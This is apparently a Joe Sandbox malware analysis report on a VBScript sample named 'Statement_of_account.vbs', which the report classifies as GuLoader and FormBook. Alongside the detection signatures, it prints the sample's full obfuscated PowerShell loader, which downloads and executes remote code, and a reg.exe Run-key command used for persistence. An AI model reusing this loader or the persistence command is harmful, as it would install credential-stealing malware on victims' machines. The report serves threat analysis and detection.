Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Statement_of_account.vbs

Overview

General Information

Sample name:Statement_of_account.vbs
Analysis ID:1557901
MD5:716e2fa9002b3b3e13e077f879378b3a
SHA1:f282e6587ab4d2e6c2d49b1bd8a7da32e3118697
SHA256:d05c1fe141254dd92d2eda0d3855d3834a69f985b6ff33535e03a0b5ecdee0ac
Tags:vbsuser-abuse_ch
Infos:

Detection

FormBook, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Early bird code injection technique detected
Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected FormBook
Yara detected GuLoader
Yara detected Powershell download and execute
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Maps a DLL or memory area into another process
Potential malicious VBS script found (suspicious strings)
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 6480 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Statement_of_account.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 6776 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Collybia Journalisation Utugtsforhold Muttonbird motoriserende #><#Alkyder Ekstinktion Frdigpakkende Institutionalise Ombrometer Ttl Arketype #>$Penthiophen='Uninterviewed';function Manned($Presubmitting){If ($host.DebuggerEnabled) {$Rep=5} for ($Energibehov=$Rep;;$Energibehov+=6){if(!$Presubmitting[$Energibehov]) { break }$Verdour+=$Presubmitting[$Energibehov]}$Verdour}function svaj($Angloamerikanske){ .($Spredningseffekter) ($Angloamerikanske)}$Dichlorvos45=Manned 'Pa klNN.naceMisrotarene.PrereWCh laeMuscabWrestcambasl SamlI SaneESprjtNPickwT';$Officershlene=Manned ' GranM.ffenoVoro zSu ariKompalhespelSkarpaKasse/';$Kanaljens=Manned 'VrfteTFlyoflBeatssRepol1Perve2';$Abjectnesses='Unrea[Sacc.NDeliresubprTSchoo. agtssHudsoESta frBrugevimporIEnscoCProagePectipEmpieoOutfoI BegnnUroceTBo aiM Adi ALutrenAfnataUnlusGIn uiETopvirBe ri]Minut:Bully:Lamensjord EDaivacScia uBusbaRVapori lyntmilliY NarkP TilrRVindeOPro,rTMicroOMell cisocloElectLDomor=Flle,$ lod KWipinAFagg NStadsABrillL Par jHaidueDistrnLatinS';$Officershlene+=Manned ' ega5Jocum.Slamb0Rnner Folk(ShrewWScaveiAfluknGunnidBe jeoO nubwPl ntsCatec LovmeNOrlo,TSteni Unexi1 cadd0 Belg.Disen0 ilba;L gtu KvartWyac tiFodbonA ino6Dy,sv4Filac;Tipon SmashxDissa6styre4Fr tr; U de Purpur KbehvLygae:Fl es1Re er3 ence1Falte.Gas,r0Svamp)xer d raadGSib seReob cEup okkeithoUnsur/Apost2 ipv0Klubc1Manag0Bavar0citro1Sekre0pena 1 alli procaFCytobiSpiserUndeseKo muf V,tiocontixRagee/F ann1Nonte3Corms1Bew,l. Kalv0';$Myoalbumose=Manned ',lipsUDelirSLa dseIndelRSingu- amebATidewgIhuk.eagoninmirint';$Enarration=Manned 'Clockh Litot SkrutStormpArkitsTippe: Tare/Bi,li/Interh UncoeHaor.aRestrv Do eyPaleoe WagoqCrys.uHpsteiAlt ipU aarm S,eeeFilten N njtCorkes KredaRattll Mephe Rhi sShala.CozedaGableuEthic/ lycaSensod F ulmGr,teiElektn Orga/MusicVLerpfeDj elrM ndidPrepoePro rnMoralsS licaManagl DesitEx os.Agg,oaOutfis RealiNavel>J.ribhSerbetNonr,tUn lop Sjlss In.r: F.br/dori./bedliqLig.tp Pugh.FdsellTysseq Twaza relae MellbIs gnoKorve2Foret. EthnrGraziuTovtr.Grun.cVrdi oUbanemrelax/Forewa ProcdregnsmLa ysikroejnAbjur/PandeVForlae .iderOphredRenkueGra nn SinnsZemayaSubjulParaltT.rmi.Epigea E.onsUnciri';$Alerion194=Manned 'Brand>';$Spredningseffekter=Manned 'ShiftITwi tEPolysX';$Dioxinbegrnsning='Esthesiogen';$Oprykningerne3='\Fakers.Spo';svaj (Manned ' Resh$ AkupgUn,seLAntigOUnc.hBLy kraDeprel Li a:RekreEAfluskCyaneSTuathT outvR ElwiATwofeKHovedTUnven=resel$indfle OutfNElodevSouag: HedeaStrucpHyp rpGraendOpvura R sstVide ADel.b+Etrus$Opst.ONon oPobserRBegroyStatsKRegauN BrugIHomofnEftergFragmeStudirTouchnSustaeFrede3');svaj (Manned 'Vasoc$Congeg,caralRespeoKo sfB SpeeA EgomL Fr t:Rep sKAngellMirdaBA.istEinhabsKnaphtMoseyRCoraliFuldgmRe umLavneseVanddnMarty1Frogf1Astou5Beska= Krat$RyalaeUdsagnkontrAK oenrEnamiRAfterAKe,atTPty.lIRodenoTita n Ildk.blazosOstrepDobbel ransIUdskatScabb(Retal$pompoaZonullSpatleTransRfeckfIStripO DiscN .ype1Fee,i9 Anna4Ga ve)');svaj (Manned $Abjectnesses);$Enarration=$Klbestrimlen115[0];$Natriumkarbonats=(Manned 'P.rah$ TestGParvilFsterO Un.rBDesulaOverslBrevi: uninG reterSt rtUT,llinAbsorDUn.trs elioTAme ie CofiNCystoeKjol NI,lcreStripS tre= Unpanbiance D viwPerfe- Havoo BullBE terjT.siaESt,mkc ValgtReser ImpalS HeisYPost,sUdpintunexteLamism A el. Semi$Br nddwoundITar rcErhv HKsemaLMisteo A aeRCrenavTalgso U ossJrl.s4 esor5');svaj ($Natriumkarbonats);svaj (Manned 'Pha,a$ DragG metar KommuRadiuntransdSaners,edert ShaneQuicknGens eTransn Deroe yrissProve.DominHKvarteindtraSallydStadsePinker ,sywsg.ngi[Engpi$ rkmiM SkabyUneveoPupilaTo talStimubHullouAllopm i.dsoS.bpesP.rfeeComp,]Revac=He to$StorvOskriff UlejfZoomoi DolpcBoflleP gnarOverasPsychh OplglSydeneLimbanResupe');$Mannerizes=Manned 'vart $ M mbG,lavrrOutlauStolpnNototd,ardis cocrtMaloteTissenTilkaeBagbinIntere MiljsDissy. idsbDD tivo ProbwS,ladn AbsulUdlaaoDagtya Stand eksuFBytteiUndiflCannaeSmgte( H,es$EthylETube nCi roaKr gsrUnderrFarmeaTre,etStre i Mic oecblan Unel,Gneta$ExtraE AkuakAntigsAutoep,omera fk,lnR obtdSpksteLuderrSkrubn UroseSubpi)';$Ekspanderne=$ekstrakt;svaj (Manned 'Liqu.$Morf.GToneaLProtyOMiladBUmisfaUnfliLNonin:Mah riNiellN MutsSAlicupSkibee Bre C ForstUndersMala.=Ekspa(CalvitIron EFjernSSuvertP ast-,rullPLigu a UltrTUaupehAbst Modko$KannieFr,gtKla meS uthepCarria Muncn sub.D MardeKombirSgnehn hillE Frem)');while (!$Inspects) {svaj (Manned 'Cyana$RinglgInd rl ThoroCensobSupera Yu,nlv rge: e,otSavlsakBeva,auncera Mesel PaaspHepatuSekstnNe trdKandeePearltudslasEksek= M st$SprinBSnailaRimi,nPyrexd tamcu Spn,sBa okiIrkeka rthon') ;svaj $Mannerizes;svaj (Manned ' UdstST llat ecptASellaRmatemTBarne- Hj,ms A tiLSk vle Ker EKendiP peci Inuri4');svaj (Manned 'Reevo$RevelgKnogll opt.Owigwab Overa Afg,LSmert:sennei EvanNG.liksKame pPasspeCatalCStigmt SuprS U ve= Styl(D laft PatheKarneSCalvitPaabe-Stearp BeraaSikkeTTekn Hadhsi Trivi$Ra.piEPosseKSvalesPyrolpNab.vASkrmsnFagsad Do reC llaR okalNCurareSusaa)') ;svaj (Manned 'Nonde$BlgvaGTreetlDiskbO Bru,B Kry,AUnd.rL knd:HogskSDictyIBjninbTilpay PagilSubepE ,runSMedinQF.reiu ,aunEF erd=Sesq $Et.rngBlotlL Lno O rskebAggluASid oLHaema:FlyvekForklVTazeeA,nacttPassoOVorterDaubrIA sidaIridolManurGHjemmU DimiiG lbenDummyEFree aMe sin PlaneRed,rrInvesEUndersPra s+ Hier+ufred% S.de$ PostkFruenLU sepBTranse ,lanSA.uzzTCol,rrUp,eli Aarsmto,ullCrosseVaskenFangs1Efter1 S nd5Klamm. PiracSociaOVineyUJawb nPe,fet') ;$Enarration=$Klbestrimlen115[$Sibylesque]}$Magahi=313075;$Elendighedens=32053;svaj (Manned ' ap,k$KubikGBiblilCsarioKostsBarpegaTrldolSvine:T ynnuAlabaRBegrdaRaci nFri ooUdsorpCommehFinmeoBlrenbRaunciHelioaBla,k Hans=Bibl, U colg tigmEAdevitPhyto-DimisCundero.sesunUn attLigedE PrefN Bandt,verp Il,am$AnhinEHep,aKChromS Fannp ammaV.deoNTvivldAdmineDa idR Allin L eke');svaj (Manned 'Fokus$R.nglgAddlelCar lo MinobVa dsaHovedl Gymn: Gen t ReciePenthn nvertFir,faLifebcLejdeuGift,lSulpho Notac OpdaySubcisBoo kt seud Unest= Dans Stikl[NonloSNoummy befusRhombtScheleDemonmNon u. Sa.lC BndsoSilennbildkv .eteeta tyr A,kit.aals]Lager:Epip :K bisFDelberBoelsoLoansm DemoBRoderaUnpens dunzeApnoe6 Nonc4 Gr.sS F.bitMellerTabariu,coun DespgHynde(Toldk$LivelU Bogsr ickpa efornLimitoHy oipSvrdehAdminoLidiabSl ngiPuffea,onso)');svaj (Manned 'lnest$SkolegFa lolSrklaO.eratbLandgASi telAfsik:Tyveam SansE BunksEnervo,mmatgRecumLCurrio RundEUnco,AtouchlNovem Rumm=Brnde Gymn[LuftksRids YWorsssSnefotWhittESuingmBybud.Vr,dnTUplejEOsteoxHulsmTHornb. LejleR piaNDe rac elskoHeksedSp ldi.ornsn.agbrg Ha d]Tro d:Skrue:Mump,a Kn bSLggerCPh.haiSk,rpIGuide.Ku tuGZygioe An,atChas,SNonnoT PresrGolfmiLa erNLentigAstel(Sinds$K ymmTpressEFrankN.rivatNonfaAcryptcKort,U.ylvelS.bveOCowbecI tanYWortssOpst TPalle)');svaj (Manned 'Captu$devoiGLangtLP piroUnpulbM.hamAVamfolClot.: B,ntOStumbp karts.ombuG bowlNTransIUnposnRegulGFattieEukliRSlide=S san$Vantrm AnnaeVrageSKrimioDoktoGRidefLPoethO eadeEAbonnaSlu tlOvert.NonslsIndmaUAblatBIjnefSCulmeTHj,edRco plIDissenMytedgAfhol(Myect$ridglmwarina ncogA ctoaBagskHUnsuliHebot,Anstd$Bre,leProh LGo,peEBevidnBe,apdForkoi SpleGHeathHSyberETroppd,trsleNoninnBeforSPaalg)');svaj $Opsgninger;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 3488 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Collybia Journalisation Utugtsforhold Muttonbird motoriserende #><#Alkyder Ekstinktion Frdigpakkende Institutionalise Ombrometer Ttl Arketype #>$Penthiophen='Uninterviewed';function Manned($Presubmitting){If ($host.DebuggerEnabled) {$Rep=5} for ($Energibehov=$Rep;;$Energibehov+=6){if(!$Presubmitting[$Energibehov]) { break }$Verdour+=$Presubmitting[$Energibehov]}$Verdour}function svaj($Angloamerikanske){ .($Spredningseffekter) ($Angloamerikanske)}$Dichlorvos45=Manned 'Pa klNN.naceMisrotarene.PrereWCh laeMuscabWrestcambasl SamlI SaneESprjtNPickwT';$Officershlene=Manned ' GranM.ffenoVoro zSu ariKompalhespelSkarpaKasse/';$Kanaljens=Manned 'VrfteTFlyoflBeatssRepol1Perve2';$Abjectnesses='Unrea[Sacc.NDeliresubprTSchoo. agtssHudsoESta frBrugevimporIEnscoCProagePectipEmpieoOutfoI BegnnUroceTBo aiM Adi ALutrenAfnataUnlusGIn uiETopvirBe ri]Minut:Bully:Lamensjord EDaivacScia uBusbaRVapori lyntmilliY NarkP TilrRVindeOPro,rTMicroOMell cisocloElectLDomor=Flle,$ lod KWipinAFagg NStadsABrillL Par jHaidueDistrnLatinS';$Officershlene+=Manned ' ega5Jocum.Slamb0Rnner Folk(ShrewWScaveiAfluknGunnidBe jeoO nubwPl ntsCatec LovmeNOrlo,TSteni Unexi1 cadd0 Belg.Disen0 ilba;L gtu KvartWyac tiFodbonA ino6Dy,sv4Filac;Tipon SmashxDissa6styre4Fr tr; U de Purpur KbehvLygae:Fl es1Re er3 ence1Falte.Gas,r0Svamp)xer d raadGSib seReob cEup okkeithoUnsur/Apost2 ipv0Klubc1Manag0Bavar0citro1Sekre0pena 1 alli procaFCytobiSpiserUndeseKo muf V,tiocontixRagee/F ann1Nonte3Corms1Bew,l. Kalv0';$Myoalbumose=Manned ',lipsUDelirSLa dseIndelRSingu- amebATidewgIhuk.eagoninmirint';$Enarration=Manned 'Clockh Litot SkrutStormpArkitsTippe: Tare/Bi,li/Interh UncoeHaor.aRestrv Do eyPaleoe WagoqCrys.uHpsteiAlt ipU aarm S,eeeFilten N njtCorkes KredaRattll Mephe Rhi sShala.CozedaGableuEthic/ lycaSensod F ulmGr,teiElektn Orga/MusicVLerpfeDj elrM ndidPrepoePro rnMoralsS licaManagl DesitEx os.Agg,oaOutfis RealiNavel>J.ribhSerbetNonr,tUn lop Sjlss In.r: F.br/dori./bedliqLig.tp Pugh.FdsellTysseq Twaza relae MellbIs gnoKorve2Foret. EthnrGraziuTovtr.Grun.cVrdi oUbanemrelax/Forewa ProcdregnsmLa ysikroejnAbjur/PandeVForlae .iderOphredRenkueGra nn SinnsZemayaSubjulParaltT.rmi.Epigea E.onsUnciri';$Alerion194=Manned 'Brand>';$Spredningseffekter=Manned 'ShiftITwi tEPolysX';$Dioxinbegrnsning='Esthesiogen';$Oprykningerne3='\Fakers.Spo';svaj (Manned ' Resh$ AkupgUn,seLAntigOUnc.hBLy kraDeprel Li a:RekreEAfluskCyaneSTuathT outvR ElwiATwofeKHovedTUnven=resel$indfle OutfNElodevSouag: HedeaStrucpHyp rpGraendOpvura R sstVide ADel.b+Etrus$Opst.ONon oPobserRBegroyStatsKRegauN BrugIHomofnEftergFragmeStudirTouchnSustaeFrede3');svaj (Manned 'Vasoc$Congeg,caralRespeoKo sfB SpeeA EgomL Fr t:Rep sKAngellMirdaBA.istEinhabsKnaphtMoseyRCoraliFuldgmRe umLavneseVanddnMarty1Frogf1Astou5Beska= Krat$RyalaeUdsagnkontrAK oenrEnamiRAfterAKe,atTPty.lIRodenoTita n Ildk.blazosOstrepDobbel ransIUdskatScabb(Retal$pompoaZonullSpatleTransRfeckfIStripO DiscN .ype1Fee,i9 Anna4Ga ve)');svaj (Manned $Abjectnesses);$Enarration=$Klbestrimlen115[0];$Natriumkarbonats=(Manned 'P.rah$ TestGParvilFsterO Un.rBDesulaOverslBrevi: uninG reterSt rtUT,llinAbsorDUn.trs elioTAme ie CofiNCystoeKjol NI,lcreStripS tre= Unpanbiance D viwPerfe- Havoo BullBE terjT.siaESt,mkc ValgtReser ImpalS HeisYPost,sUdpintunexteLamism A el. Semi$Br nddwoundITar rcErhv HKsemaLMisteo A aeRCrenavTalgso U ossJrl.s4 esor5');svaj ($Natriumkarbonats);svaj (Manned 'Pha,a$ DragG metar KommuRadiuntransdSaners,edert ShaneQuicknGens eTransn Deroe yrissProve.DominHKvarteindtraSallydStadsePinker ,sywsg.ngi[Engpi$ rkmiM SkabyUneveoPupilaTo talStimubHullouAllopm i.dsoS.bpesP.rfeeComp,]Revac=He to$StorvOskriff UlejfZoomoi DolpcBoflleP gnarOverasPsychh OplglSydeneLimbanResupe');$Mannerizes=Manned 'vart $ M mbG,lavrrOutlauStolpnNototd,ardis cocrtMaloteTissenTilkaeBagbinIntere MiljsDissy. idsbDD tivo ProbwS,ladn AbsulUdlaaoDagtya Stand eksuFBytteiUndiflCannaeSmgte( H,es$EthylETube nCi roaKr gsrUnderrFarmeaTre,etStre i Mic oecblan Unel,Gneta$ExtraE AkuakAntigsAutoep,omera fk,lnR obtdSpksteLuderrSkrubn UroseSubpi)';$Ekspanderne=$ekstrakt;svaj (Manned 'Liqu.$Morf.GToneaLProtyOMiladBUmisfaUnfliLNonin:Mah riNiellN MutsSAlicupSkibee Bre C ForstUndersMala.=Ekspa(CalvitIron EFjernSSuvertP ast-,rullPLigu a UltrTUaupehAbst Modko$KannieFr,gtKla meS uthepCarria Muncn sub.D MardeKombirSgnehn hillE Frem)');while (!$Inspects) {svaj (Manned 'Cyana$RinglgInd rl ThoroCensobSupera Yu,nlv rge: e,otSavlsakBeva,auncera Mesel PaaspHepatuSekstnNe trdKandeePearltudslasEksek= M st$SprinBSnailaRimi,nPyrexd tamcu Spn,sBa okiIrkeka rthon') ;svaj $Mannerizes;svaj (Manned ' UdstST llat ecptASellaRmatemTBarne- Hj,ms A tiLSk vle Ker EKendiP peci Inuri4');svaj (Manned 'Reevo$RevelgKnogll opt.Owigwab Overa Afg,LSmert:sennei EvanNG.liksKame pPasspeCatalCStigmt SuprS U ve= Styl(D laft PatheKarneSCalvitPaabe-Stearp BeraaSikkeTTekn Hadhsi Trivi$Ra.piEPosseKSvalesPyrolpNab.vASkrmsnFagsad Do reC llaR okalNCurareSusaa)') ;svaj (Manned 'Nonde$BlgvaGTreetlDiskbO Bru,B Kry,AUnd.rL knd:HogskSDictyIBjninbTilpay PagilSubepE ,runSMedinQF.reiu ,aunEF erd=Sesq $Et.rngBlotlL Lno O rskebAggluASid oLHaema:FlyvekForklVTazeeA,nacttPassoOVorterDaubrIA sidaIridolManurGHjemmU DimiiG lbenDummyEFree aMe sin PlaneRed,rrInvesEUndersPra s+ Hier+ufred% S.de$ PostkFruenLU sepBTranse ,lanSA.uzzTCol,rrUp,eli Aarsmto,ullCrosseVaskenFangs1Efter1 S nd5Klamm. PiracSociaOVineyUJawb nPe,fet') ;$Enarration=$Klbestrimlen115[$Sibylesque]}$Magahi=313075;$Elendighedens=32053;svaj (Manned ' ap,k$KubikGBiblilCsarioKostsBarpegaTrldolSvine:T ynnuAlabaRBegrdaRaci nFri ooUdsorpCommehFinmeoBlrenbRaunciHelioaBla,k Hans=Bibl, U colg tigmEAdevitPhyto-DimisCundero.sesunUn attLigedE PrefN Bandt,verp Il,am$AnhinEHep,aKChromS Fannp ammaV.deoNTvivldAdmineDa idR Allin L eke');svaj (Manned 'Fokus$R.nglgAddlelCar lo MinobVa dsaHovedl Gymn: Gen t ReciePenthn nvertFir,faLifebcLejdeuGift,lSulpho Notac OpdaySubcisBoo kt seud Unest= Dans Stikl[NonloSNoummy befusRhombtScheleDemonmNon u. Sa.lC BndsoSilennbildkv .eteeta tyr A,kit.aals]Lager:Epip :K bisFDelberBoelsoLoansm DemoBRoderaUnpens dunzeApnoe6 Nonc4 Gr.sS F.bitMellerTabariu,coun DespgHynde(Toldk$LivelU Bogsr ickpa efornLimitoHy oipSvrdehAdminoLidiabSl ngiPuffea,onso)');svaj (Manned 'lnest$SkolegFa lolSrklaO.eratbLandgASi telAfsik:Tyveam SansE BunksEnervo,mmatgRecumLCurrio RundEUnco,AtouchlNovem Rumm=Brnde Gymn[LuftksRids YWorsssSnefotWhittESuingmBybud.Vr,dnTUplejEOsteoxHulsmTHornb. LejleR piaNDe rac elskoHeksedSp ldi.ornsn.agbrg Ha d]Tro d:Skrue:Mump,a Kn bSLggerCPh.haiSk,rpIGuide.Ku tuGZygioe An,atChas,SNonnoT PresrGolfmiLa erNLentigAstel(Sinds$K ymmTpressEFrankN.rivatNonfaAcryptcKort,U.ylvelS.bveOCowbecI tanYWortssOpst TPalle)');svaj (Manned 'Captu$devoiGLangtLP piroUnpulbM.hamAVamfolClot.: B,ntOStumbp karts.ombuG bowlNTransIUnposnRegulGFattieEukliRSlide=S san$Vantrm AnnaeVrageSKrimioDoktoGRidefLPoethO eadeEAbonnaSlu tlOvert.NonslsIndmaUAblatBIjnefSCulmeTHj,edRco plIDissenMytedgAfhol(Myect$ridglmwarina ncogA ctoaBagskHUnsuliHebot,Anstd$Bre,leProh LGo,peEBevidnBe,apdForkoi SpleGHeathHSyberETroppd,trsleNoninnBeforSPaalg)');svaj $Opsgninger;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 2316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 5568 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • cmd.exe (PID: 4080 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Socialpolitikken" /t REG_EXPAND_SZ /d "%valgdagen% -windowstyle 1 $Undertakerish=(gp -Path 'HKCU:\Software\Nutrias\').Esponton;%valgdagen% ($Undertakerish)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 5956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • reg.exe (PID: 2484 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Socialpolitikken" /t REG_EXPAND_SZ /d "%valgdagen% -windowstyle 1 $Undertakerish=(gp -Path 'HKCU:\Software\Nutrias\').Esponton;%valgdagen% ($Undertakerish)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000008.00000002.2098902399.000000001FA80000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000003.00000002.2005154167.0000000009D30000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      00000003.00000002.2004279815.0000000008B60000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
        00000003.00000002.1987552917.0000000005E5B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
          00000001.00000002.1872749558.000001F59006F000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
            Click to see the 4 entries
            SourceRuleDescriptionAuthorStrings
            amsi64_6776.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
              amsi32_3488.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
              • 0xc7fb:$b2: ::FromBase64String(
              • 0xb883:$s1: -join
              • 0x502f:$s4: +=
              • 0x50f1:$s4: +=
              • 0x9318:$s4: +=
              • 0xb435:$s4: +=
              • 0xb71f:$s4: +=
              • 0xb865:$s4: +=
              • 0x15f17:$s4: +=
              • 0x15f97:$s4: +=
              • 0x1605d:$s4: +=
              • 0x160dd:$s4: +=
              • 0x162b3:$s4: +=
              • 0x16337:$s4: +=
              • 0xc09c:$e4: Get-WmiObject
              • 0xc28b:$e4: Get-Process
              • 0xc2e3:$e4: Start-Process
              • 0x16b9d:$e4: Get-Process

              System Summary

              barindex
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Statement_of_account.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Statement_of_account.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Statement_of_account.vbs", ProcessId: 6480, ProcessName: wscript.exe
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: %valgdagen% -windowstyle 1 $Undertakerish=(gp -Path 'HKCU:\Software\Nutrias\').Esponton;%valgdagen% ($Undertakerish), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 2484, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Socialpolitikken
              Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Socialpolitikken" /t REG_EXPAND_SZ /d "%valgdagen% -windowstyle 1 $Undertakerish=(gp -Path 'HKCU:\Software\Nutrias\').Esponton;%valgdagen% ($Undertakerish)", CommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Socialpolitikken" /t REG_EXPAND_SZ /d "%valgdagen% -windowstyle 1 $Undertakerish=(gp -Path 'HKCU:\Software\Nutrias\').Esponton;%valgdagen% ($Undertakerish)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Socialpolitikken" /t REG_EXPAND_SZ /d "%valgdagen% -windowstyle 1 $Undertakerish=(gp -Path 'HKCU:\Software\Nutrias\').Esponton;%valgdagen% ($Undertakerish)", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 4080, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Socialpolitikken" /t REG_EXPAND_SZ /d "%valgdagen% -windowstyle 1 $Undertakerish=(gp -Path 'HKCU:\Software\Nutrias\').Esponton;%valgdagen% ($Undertakerish)", ProcessId: 2484, ProcessName: reg.exe
              Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 203.170.87.17, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 5568, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49480
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Socialpolitikken" /t REG_EXPAND_SZ /d "%valgdagen% -windowstyle 1 $Undertakerish=(gp -Path 'HKCU:\Software\Nutrias\').Esponton;%valgdagen% ($Undertakerish)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Socialpolitikken" /t REG_EXPAND_SZ /d "%valgdagen% -windowstyle 1 $Undertakerish=(gp -Path 'HKCU:\Software\Nutrias\').Esponton;%valgdagen% ($Undertakerish)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\SysWOW64\msiexec.exe", ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 5568, ParentProcessName: msiexec.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Socialpolitikken" /t REG_EXPAND_SZ /d "%valgdagen% -windowstyle 1 $Undertakerish=(gp -Path 'HKCU:\Software\Nutrias\').Esponton;%valgdagen% ($Undertakerish)", ProcessId: 4080, ProcessName: cmd.exe
              Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Statement_of_account.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Statement_of_account.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Statement_of_account.vbs", ProcessId: 6480, ProcessName: wscript.exe
